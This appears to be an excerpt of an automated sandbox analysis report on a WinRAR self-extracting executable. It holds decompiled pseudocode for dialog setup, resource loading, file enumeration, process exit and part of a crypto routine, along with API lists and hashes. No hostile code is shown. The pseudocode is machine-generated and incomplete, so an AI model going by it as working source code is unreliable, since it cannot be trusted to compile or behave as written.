				 *0xd08444 = _t102 + 0x30; // executed
				DialogBoxParamW(_t93, L"STARTDLG", _t73, E00CDB7E0, _t73); // executed
				 *0xd08444 = _t73;
				 *0xd08440 = _t73;
				E00CD9178(_t102 + 0x24);
				E00CD9178(_t102 + 0x50);
				_t50 =  *0xd1fca8;
				if(_t50 != 0) {
					Sleep(_t50);
				}
				if( *0xd09468 != 0) {
					E00CDAE2F(0xd1ec90);
				}
				E00CCF279(0xd17a78);
				if( *0xd1fca0 > 0) {
					L00CDEE5C( *0xd1fc90);
				}
				DeleteObject( *0xd17b7c);
				_t53 =  *0xd1ec84;
				if(_t53 != 0) {
					DeleteObject(_t53);
				}
				if( *0xd01098 == 0 &&  *0xd08454 != 0) {
					E00CC6D83(0xd01098, 0xff);
				}
				_t54 =  *0xd1fcac;
				 *0xd08454 = 1;
				if( *0xd1fcac != 0) {
					E00CDDC3B(_t54);
					CloseHandle( *0xd1fcac);
				}
				_t94 =  *0xd01098;
				if( *0xd17b7a != 0) {
					_t57 =  *0xcfe728; // 0x3e8
					if( *0xd17b7b == 0) {
						__eflags = _t57;
						if(_t57 < 0) {
							_t94 = _t94 - _t57;
							__eflags = _t94;
						}
					} else {
						_t94 =  *0xd1fca4;
						if(_t57 > 0) {
							_t94 = _t94 + _t57;
						}
					}
				}
				E00CDAC7C(_t102 + 0x1c); // executed
				return _t94;
			}





















                                                    0x00cddf1e
                                                    0x00cddf1e
                                                    0x00cddf29
                                                    0x00cddf38
                                                    0x00cddf3d
                                                    0x00cddf41
                                                    0x00cddf4b
                                                    0x00cddf54
                                                    0x00cddf59
                                                    0x00cddf62
                                                    0x00cddf64
                                                    0x00cddf66
                                                    0x00cddf68
                                                    0x00cddf69
                                                    0x00cddf74
                                                    0x00cddfe1
                                                    0x00cddf76
                                                    0x00cddf89
                                                    0x00cddf8d
                                                    0x00cddfce
                                                    0x00cddfd4
                                                    0x00cddfd4
                                                    0x00cddfd7
                                                    0x00cddfdd
                                                    0x00cddf74
                                                    0x00cddff2
                                                    0x00cddffe
                                                    0x00cde009
                                                    0x00cde014
                                                    0x00cde01a
                                                    0x00cde020
                                                    0x00cde026
                                                    0x00cde02c
                                                    0x00cde032
                                                    0x00cde048
                                                    0x00cde04d
                                                    0x00cde05a
                                                    0x00cde067
                                                    0x00cde06c
                                                    0x00cde072
                                                    0x00cde078
                                                    0x00cde07e
                                                    0x00cde083
                                                    0x00cde08e
                                                    0x00cde093
                                                    0x00cde09c
                                                    0x00cde0a5
                                                    0x00cde0b5
                                                    0x00cde0c4
                                                    0x00cde0c9
                                                    0x00cde0d3
                                                    0x00cde0d9
                                                    0x00cde0df
                                                    0x00cde0e8
                                                    0x00cde0ed
                                                    0x00cde0f4
                                                    0x00cde0f7
                                                    0x00cde0f7
                                                    0x00cde104
                                                    0x00cde106
                                                    0x00cde106
                                                    0x00cde110
                                                    0x00cde11c
                                                    0x00cde124
                                                    0x00cde129
                                                    0x00cde130
                                                    0x00cde136
                                                    0x00cde13d
                                                    0x00cde140
                                                    0x00cde140
                                                    0x00cde14d
                                                    0x00cde162
                                                    0x00cde162
                                                    0x00cde167
                                                    0x00cde16c
                                                    0x00cde175
                                                    0x00cde178
                                                    0x00cde183
                                                    0x00cde183
                                                    0x00cde190
                                                    0x00cde196
                                                    0x00cde19f
                                                    0x00cde1a4
                                                    0x00cde1b4
                                                    0x00cde1b6
                                                    0x00cde1b8
                                                    0x00cde1b8
                                                    0x00cde1b8
                                                    0x00cde1a6
                                                    0x00cde1a6
                                                    0x00cde1ae
                                                    0x00cde1b0
                                                    0x00cde1b0
                                                    0x00cde1ae
                                                    0x00cde1a4
                                                    0x00cde1be
                                                    0x00cde1ce

                                                    APIs
                                                      • Part of subcall function 00CD0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CD087C
                                                      • Part of subcall function 00CD0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CD088E
                                                      • Part of subcall function 00CD0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CD08BF
                                                      • Part of subcall function 00CDA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CDA655
                                                      • Part of subcall function 00CDAC16: OleInitialize.OLE32(00000000), ref: 00CDAC2F
                                                      • Part of subcall function 00CDAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CDAC66
                                                      • Part of subcall function 00CDAC16: SHGetMalloc.SHELL32(00D08438), ref: 00CDAC70
                                                    • GetCommandLineW.KERNEL32 ref: 00CDDF5C
                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CDDF83
                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CDDF94
                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00CDDFCE
                                                      • Part of subcall function 00CDDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CDDBF4
                                                      • Part of subcall function 00CDDBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CDDC30
                                                    • CloseHandle.KERNEL32(00000000), ref: 00CDDFD7
                                                    • GetModuleFileNameW.KERNEL32(00000000,00D1EC90,00000800), ref: 00CDDFF2
                                                    • SetEnvironmentVariableW.KERNELBASE(sfxname,00D1EC90), ref: 00CDDFFE
                                                    • GetLocalTime.KERNEL32(?), ref: 00CDE009
                                                    • _swprintf.LIBCMT ref: 00CDE048
                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CDE05A
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00CDE061
                                                    • LoadIconW.USER32(00000000,00000064), ref: 00CDE078
                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CDE0C9
                                                    • Sleep.KERNEL32(?), ref: 00CDE0F7
                                                    • DeleteObject.GDI32 ref: 00CDE130
                                                    • DeleteObject.GDI32(?), ref: 00CDE140
                                                    • CloseHandle.KERNEL32 ref: 00CDE183
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                    • API String ID: 3049964643-2656992072
                                                    • Opcode ID: 96511bb60a9eb4bd604035a040d458a2f503e503838da82f012c614102627c1a
                                                    • Instruction ID: ad3e4e2afdb8e70426ef12c3275aaf09c854915aef461ab4cb38d36035651922
                                                    • Opcode Fuzzy Hash: 96511bb60a9eb4bd604035a040d458a2f503e503838da82f012c614102627c1a
                                                    • Instruction Fuzzy Hash: E961D271A04345BBD320ABA4EC49F7F77A9AB45700F00442BFA4AD23A1DF749944D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDA6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 812 cda6c2-cda6df FindResourceW 813 cda7db 812->813 814 cda6e5-cda6f6 SizeofResource 812->814 815 cda7dd-cda7e1 813->815 814->813 816 cda6fc-cda70b LoadResource 814->816 816->813 817 cda711-cda71c LockResource 816->817 817->813 818 cda722-cda737 GlobalAlloc 817->818 819 cda73d-cda746 GlobalLock 818->819 820 cda7d3-cda7d9 818->820 821 cda7cc-cda7cd GlobalFree 819->821 822 cda74c-cda76a call ce0320 819->822 820->815 821->820 826 cda76c-cda78e call cda626 822->826 827 cda7c5-cda7c6 GlobalUnlock 822->827 826->827 832 cda790-cda798 826->832 827->821 833 cda79a-cda7ae GdipCreateHBITMAPFromBitmap 832->833 834 cda7b3-cda7c1 832->834 833->834 835 cda7b0 833->835 834->827 835->834
                                                    C-Code - Quality: 53%
                                                    			E00CDA6C2(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t27;
				char* _t34;
				void* _t36;
				void* _t38;
				intOrPtr* _t39;
				long _t44;
				intOrPtr* _t45;
				struct HRSRC__* _t46;

				_t46 = FindResourceW( *0xd01028, _a4, "PNG");
				if(_t46 == 0) {
					L15:
					return 0;
				}
				_t44 = SizeofResource( *0xd01028, _t46);
				if(_t44 == 0) {
					goto L15;
				}
				_t17 = LoadResource( *0xd01028, _t46);
				if(_t17 == 0) {
					goto L15;
				}
				_t18 = LockResource(_t17);
				_t47 = _t18;
				if(_t18 == 0) {
					goto L15;
				}
				_v4 = 0;
				_t19 = GlobalAlloc(2, _t44); // executed
				_t36 = _t19;
				if(_t36 == 0) {
					L14:
					return _v4;
				}
				if(GlobalLock(_t36) == 0) {
					L13:
					GlobalFree(_t36);
					goto L14;
				}
				E00CE0320(_t21, _t47, _t44);
				_v8 = 0;
				_push( &_v8);
				_push(0);
				_push(_t36);
				if( *0xd23180() == 0) {
					_t27 = E00CDA626(_t25, _t38, _v20, 0); // executed
					_t39 = _v28;
					_t45 = _t27;
					 *0xcf3278(_t39);
					 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 8))))();
					if(_t45 != 0) {
						 *((intOrPtr*)(_t45 + 8)) = 0;
						if( *((intOrPtr*)(_t45 + 8)) == 0) {
							_push(0xffffff);
							_t34 =  &_v20;
							_push(_t34);
							_push( *((intOrPtr*)(_t45 + 4)));
							L00CDEB26(); // executed
							if(_t34 != 0) {
								 *((intOrPtr*)(_t45 + 8)) = _t34;
							}
						}
						 *0xcf3278(1);
						 *((intOrPtr*)( *((intOrPtr*)( *_t45))))();
					}
				}
				GlobalUnlock(_t36);
				goto L13;
			}



















                                                    0x00cda6db
                                                    0x00cda6df
                                                    0x00cda7db
                                                    0x00000000
                                                    0x00cda7db
                                                    0x00cda6f2
                                                    0x00cda6f6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cda703
                                                    0x00cda70b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cda712
                                                    0x00cda718
                                                    0x00cda71c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cda729
                                                    0x00cda72d
                                                    0x00cda733
                                                    0x00cda737
                                                    0x00cda7d3
                                                    0x00000000
                                                    0x00cda7d8
                                                    0x00cda746
                                                    0x00cda7cc
                                                    0x00cda7cd
                                                    0x00000000
                                                    0x00cda7cd
                                                    0x00cda74f
                                                    0x00cda757
                                                    0x00cda75f
                                                    0x00cda760
                                                    0x00cda761
                                                    0x00cda76a
                                                    0x00cda771
                                                    0x00cda776
                                                    0x00cda77a
                                                    0x00cda784
                                                    0x00cda78a
                                                    0x00cda78e
                                                    0x00cda793
                                                    0x00cda798
                                                    0x00cda79a
                                                    0x00cda79f
                                                    0x00cda7a3
                                                    0x00cda7a4
                                                    0x00cda7a7
                                                    0x00cda7ae
                                                    0x00cda7b0
                                                    0x00cda7b0
                                                    0x00cda7ae
                                                    0x00cda7bb
                                                    0x00cda7c3
                                                    0x00cda7c3
                                                    0x00cda78e
                                                    0x00cda7c6
                                                    0x00000000

                                                    APIs
                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6D5
                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6EC
                                                    • LoadResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA703
                                                    • LockResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA712
                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA72D
                                                    • GlobalLock.KERNEL32 ref: 00CDA73E
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00CDA7C6
                                                      • Part of subcall function 00CDA626: GdipAlloc.GDIPLUS(00000010), ref: 00CDA62C
                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CDA7A7
                                                    • GlobalFree.KERNEL32 ref: 00CDA7CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                    • String ID: PNG
                                                    • API String ID: 541704414-364855578
                                                    • Opcode ID: 3a5d4f3c4b5ec32a0dfd1d9f07aca38648492b79912ca546ff06321250c37f78
                                                    • Instruction ID: b1630b1cecd9fe471fb7be987c7451b9123abae896e4612ee5534265ed431519
                                                    • Opcode Fuzzy Hash: 3a5d4f3c4b5ec32a0dfd1d9f07aca38648492b79912ca546ff06321250c37f78
                                                    • Instruction Fuzzy Hash: 5E319175600342BFD7109F21EC88E2F7BB9EF84761B15451AFA15C2321EB31DD44DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1026 cca69b-cca6bf call cdec50 1029 cca727-cca730 FindNextFileW 1026->1029 1030 cca6c1-cca6ce FindFirstFileW 1026->1030 1031 cca742-cca7ff call cd0602 call ccc310 call cd15da * 3 1029->1031 1032 cca732-cca740 GetLastError 1029->1032 1030->1031 1033 cca6d0-cca6e2 call ccbb03 1030->1033 1037 cca804-cca811 1031->1037 1034 cca719-cca722 1032->1034 1040 cca6fe-cca707 GetLastError 1033->1040 1041 cca6e4-cca6fc FindFirstFileW 1033->1041 1034->1037 1043 cca709-cca70c 1040->1043 1044 cca717 1040->1044 1041->1031 1041->1040 1043->1044 1046 cca70e-cca711 1043->1046 1044->1034 1046->1044 1048 cca713-cca715 1046->1048 1048->1034
                                                    C-Code - Quality: 81%
                                                    			E00CCA69B(void* _a4, WCHAR* _a8, intOrPtr _a12) {
				intOrPtr _v572;
				intOrPtr _v580;
				intOrPtr _v588;
				struct _WIN32_FIND_DATAW _v596;
				short _v4692;
				int _t44;
				int _t49;
				signed int _t61;
				signed int _t62;
				void* _t63;
				long _t66;
				void* _t69;
				signed int _t78;
				void* _t79;
				intOrPtr _t80;
				void* _t81;

				E00CDEC50(0x1250);
				_t81 = _a4;
				_t79 = _t78 | 0xffffffff;
				_push( &_v596);
				if(_t81 != _t79) {
					_t44 = FindNextFileW(_t81, ??);
					__eflags = _t44;
					if(_t44 != 0) {
						L12:
						_t80 = _a12;
						E00CD0602(_t80, _a8, 0x800);
						_push(0x800);
						E00CCC310(__eflags, _t80,  &(_v596.cFileName));
						_t49 = 0 + _v596.nFileSizeLow;
						__eflags = _t49;
						 *(_t80 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *(_t80 + 0x1008) = _v596.dwFileAttributes;
						 *((intOrPtr*)(_t80 + 0x1004)) = _v596.nFileSizeHigh;
						 *((intOrPtr*)(_t80 + 0x1028)) = _v596.ftCreationTime;
						 *((intOrPtr*)(_t80 + 0x102c)) = _v588;
						 *((intOrPtr*)(_t80 + 0x1030)) = _v596.ftLastAccessTime;
						 *((intOrPtr*)(_t80 + 0x1034)) = _v580;
						 *((intOrPtr*)(_t80 + 0x1038)) = _v596.ftLastWriteTime;
						 *((intOrPtr*)(_t80 + 0x103c)) = _v572;
						E00CD15DA(_t80 + 0x1010,  &(_v596.ftLastWriteTime));
						E00CD15DA(_t80 + 0x1018,  &(_v596.ftCreationTime));
						E00CD15DA(_t80 + 0x1020,  &(_v596.ftLastAccessTime));
						L13:
						 *(_t80 + 0x1040) =  *(_t80 + 0x1040) & 0x00000000;
						return _t81;
					}
					_t81 = _t79;
					_t61 = GetLastError();
					__eflags = _t61 - 0x12;
					_t62 = _t61 & 0xffffff00 | _t61 != 0x00000012;
					L9:
					_t80 = _a12;
					 *(_t80 + 0x1044) = _t62;
					goto L13;
				}
				_t63 = FindFirstFileW(_a8, ??); // executed
				_t81 = _t63;
				if(_t81 != _t79) {
					goto L12;
				}
				if(E00CCBB03(_a8,  &_v4692, 0x800) == 0) {
					L4:
					_t66 = GetLastError();
					if(_t66 == 2 || _t66 == 3 || _t66 == 0x12) {
						_t62 = 0;
						__eflags = 0;
					} else {
						_t62 = 1;
					}
					goto L9;
				}
				_t69 = FindFirstFileW( &_v4692,  &_v596); // executed
				_t81 = _t69;
				if(_t81 != _t79) {
					goto L12;
				}
				goto L4;
			}



















                                                    0x00cca6a3
                                                    0x00cca6aa
                                                    0x00cca6b4
                                                    0x00cca6bc
                                                    0x00cca6bf
                                                    0x00cca728
                                                    0x00cca72e
                                                    0x00cca730
                                                    0x00cca742
                                                    0x00cca742
                                                    0x00cca74a
                                                    0x00cca74f
                                                    0x00cca758
                                                    0x00cca765
                                                    0x00cca765
                                                    0x00cca76b
                                                    0x00cca777
                                                    0x00cca77a
                                                    0x00cca786
                                                    0x00cca792
                                                    0x00cca79e
                                                    0x00cca7aa
                                                    0x00cca7b6
                                                    0x00cca7c2
                                                    0x00cca7ce
                                                    0x00cca7db
                                                    0x00cca7ed
                                                    0x00cca7ff
                                                    0x00cca804
                                                    0x00cca804
                                                    0x00cca811
                                                    0x00cca811
                                                    0x00cca732
                                                    0x00cca734
                                                    0x00cca73a
                                                    0x00cca73d
                                                    0x00cca719
                                                    0x00cca719
                                                    0x00cca71c
                                                    0x00000000
                                                    0x00cca71c
                                                    0x00cca6c4
                                                    0x00cca6ca
                                                    0x00cca6ce
                                                    0x00000000
                                                    0x00000000
                                                    0x00cca6e2
                                                    0x00cca6fe
                                                    0x00cca6fe
                                                    0x00cca707
                                                    0x00cca717
                                                    0x00cca717
                                                    0x00cca713
                                                    0x00cca713
                                                    0x00cca713
                                                    0x00000000
                                                    0x00cca707
                                                    0x00cca6f2
                                                    0x00cca6f8
                                                    0x00cca6fc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6C4
                                                      • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6F2
                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6FE
                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA728
                                                    • GetLastError.KERNEL32(?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA734
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                    • String ID:
                                                    • API String ID: 42610566-0
                                                    • Opcode ID: dc4b0683fa7bc1563b306c47cd28cbc6507c119b2241fc829546be79d818e682
                                                    • Instruction ID: 0bd3d2119a5de08dabd0e148464633c5fee509b36daac70e3f78f8961415629b
                                                    • Opcode Fuzzy Hash: dc4b0683fa7bc1563b306c47cd28cbc6507c119b2241fc829546be79d818e682
                                                    • Instruction Fuzzy Hash: 8F418072500559ABCB25DF64CC88BE9B7B8FB48350F14419AE96DD3200D734AE90DF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CE7DEE(int _a4) {
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				void* _t19;

				if(E00CEB076(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00CE7E73(_t15, _a4);
				ExitProcess(_a4);
			}








                                                    0x00ce7dfa
                                                    0x00ce7e16
                                                    0x00ce7e16
                                                    0x00ce7e1f
                                                    0x00ce7e28

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,00CE7DC4,?,00CFC300,0000000C,00CE7F1B,?,00000002,00000000), ref: 00CE7E0F
                                                    • TerminateProcess.KERNEL32(00000000,?,00CE7DC4,?,00CFC300,0000000C,00CE7F1B,?,00000002,00000000), ref: 00CE7E16
                                                    • ExitProcess.KERNEL32 ref: 00CE7E28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 873838a1e9dcb8ec512ab8134f66a8d386ebec8e86899bbd1ed0eb732709036a
                                                    • Instruction ID: fd21ebdc42877ba7ef0112347b27df6dbfab407cbd84f431e280ab2befcbbcdd
                                                    • Opcode Fuzzy Hash: 873838a1e9dcb8ec512ab8134f66a8d386ebec8e86899bbd1ed0eb732709036a
                                                    • Instruction Fuzzy Hash: 03E09A31004294BFCB116F55DD0AB5A7F69AB50341B004555F8158B132CB35EE51DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC848E Relevance: 2.5, APIs: 1, Instructions: 960COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 56%
                                                    			E00CC848E(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t383;
				signed int _t387;
				signed int _t392;
				signed int _t398;
				void* _t400;
				signed int _t401;
				signed int _t405;
				signed int _t406;
				intOrPtr _t407;
				signed int _t411;
				signed int _t416;
				signed int _t417;
				signed int _t421;
				signed int _t431;
				signed int _t432;
				signed int _t435;
				signed int _t436;
				signed int _t442;
				signed int _t445;
				signed int _t446;
				char _t448;
				signed int _t449;
				signed int _t450;
				signed int _t473;
				signed int _t482;
				intOrPtr _t485;
				signed int _t495;
				char _t500;
				char _t501;
				void* _t508;
				void* _t515;
				void* _t517;
				signed int _t525;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t534;
				signed int _t536;
				signed int _t543;
				signed int _t552;
				signed int _t554;
				signed int _t556;
				signed int _t558;
				signed char _t559;
				signed int _t562;
				void* _t567;
				signed int _t573;
				intOrPtr* _t582;
				signed int _t585;
				signed int _t586;
				signed int _t595;
				signed int _t596;
				intOrPtr _t599;
				signed int _t602;
				signed int _t611;
				signed int _t613;
				signed int _t616;
				signed int _t619;
				signed int _t621;
				signed int _t622;
				signed int _t624;
				signed int _t625;
				signed int _t628;
				void* _t637;
				intOrPtr _t645;
				char _t646;
				signed int _t649;
				signed int _t650;
				void* _t657;
				void* _t658;
				signed int _t675;
				intOrPtr _t686;
				void* _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t692;
				signed int _t695;
				intOrPtr _t697;
				signed int _t702;
				signed int _t704;
				signed int _t707;
				void* _t712;
				signed int _t713;
				signed int _t716;
				signed int _t717;
				void* _t719;
				void* _t721;
				void* _t723;
				void* _t725;

				E00CDEB78(0xcf2858, _t721);
				E00CDEC50(0x60ac);
				_t582 =  *((intOrPtr*)(_t721 + 8));
				_t684 = 0;
				_t697 = __ecx;
				 *((intOrPtr*)(_t721 - 0x1c)) = __ecx;
				_t585 =  *( *((intOrPtr*)(__ecx + 8)) + 0x92fa) & 0x0000ffff;
				 *(_t721 - 0x18) = _t585;
				if( *((intOrPtr*)(_t721 + 0xc)) != 0) {
					_t704 = __ecx + 0x10;
					 *(_t721 - 0x20) = _t704;
					L5:
					_t383 =  *((intOrPtr*)(_t582 + 0x21f4));
					if(_t383 == 2) {
						 *(_t697 + 0x10ff) = _t684;
						__eflags =  *(_t582 + 0x32f4) - _t684;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t582 + 0x32fc) - _t684;
							if(__eflags > 0) {
								L26:
								_t586 =  *(_t697 + 8);
								__eflags =  *((intOrPtr*)(_t586 + 0x7164)) - _t684;
								if( *((intOrPtr*)(_t586 + 0x7164)) != _t684) {
									L29:
									 *(_t721 - 0x13) = _t684;
									_t37 = _t721 - 0x60b8; // -22712
									_t38 = _t721 - 0x13; // 0x7ed
									_t387 = E00CC5D1A(_t582 + 0x2298, _t38, 6, _t684, _t37, 0x800);
									__eflags = _t387;
									 *(_t721 - 0x11) = _t387 != 0;
									__eflags = _t387;
									if(_t387 != 0) {
										__eflags =  *(_t721 - 0x13);
										if( *(_t721 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t697 + 0xf9)) = 0;
										}
									}
									E00CC2112(_t582);
									_push(0x800);
									_t43 = _t721 - 0x30b8; // -10424
									_push(_t582 + 0x22c0);
									E00CCB76C(_t582);
									__eflags =  *((char*)(_t582 + 0x338b));
									 *(_t721 - 0x24) = 1;
									if( *((char*)(_t582 + 0x338b)) == 0) {
										_t392 = E00CC2209(_t582);
										__eflags = _t392;
										if(_t392 == 0) {
											_t559 =  *(_t697 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t559 + 0x82c4));
											asm("sbb al, al");
											_t61 = _t721 - 0x11;
											 *_t61 =  *(_t721 - 0x11) &  !_t559;
											__eflags =  *_t61;
										}
									} else {
										_t562 =  *( *(_t697 + 8) + 0x82c4);
										__eflags = _t562 - 1;
										if(_t562 != 1) {
											__eflags =  *(_t721 - 0x13);
											if( *(_t721 - 0x13) == 0) {
												__eflags = _t562;
												 *(_t721 - 0x11) =  *(_t721 - 0x11) & (_t562 & 0xffffff00 | _t562 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t721 - 0x30b8; // -10424
												_t567 = E00CCC249(_t54);
												_t675 =  *(_t697 + 8);
												__eflags =  *((intOrPtr*)(_t675 + 0x82c4)) - 1 - _t567;
												if( *((intOrPtr*)(_t675 + 0x82c4)) - 1 != _t567) {
													 *(_t721 - 0x11) = 0;
												} else {
													_t57 = _t721 - 0x30b8; // -10424
													_push(1);
													E00CCC249(_t57);
												}
											}
										}
									}
